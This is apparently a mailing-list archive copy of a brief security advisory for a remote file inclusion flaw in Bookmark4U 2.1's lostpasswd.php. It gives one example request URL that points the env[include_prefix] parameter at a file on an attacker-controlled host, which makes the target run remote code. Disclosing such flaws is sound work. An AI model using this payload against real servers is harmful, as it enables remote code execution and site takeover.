Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued

example - http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux